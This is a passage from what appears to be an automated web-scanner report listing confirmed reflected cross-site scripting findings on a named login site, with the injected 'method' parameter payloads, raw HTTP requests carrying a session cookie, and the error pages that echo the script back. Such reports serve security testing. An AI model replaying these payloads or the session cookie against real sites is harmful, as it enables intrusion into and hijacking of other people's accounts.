		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B7D)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:11 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000B83)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B83)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B83)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 29
Accept-Encoding: gzip, deflate

login=3&amp;submit.x=0&amp;submit.y=0
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000B83)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:12 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000BB9)%3C/script%3E&amp;user=3&amp;ec=1&amp;ech=6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000BB9)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[GET /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000BB9)%3C/script%3E&amp;user=3&amp;ec=1&amp;ech=6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:13:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000BB9)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
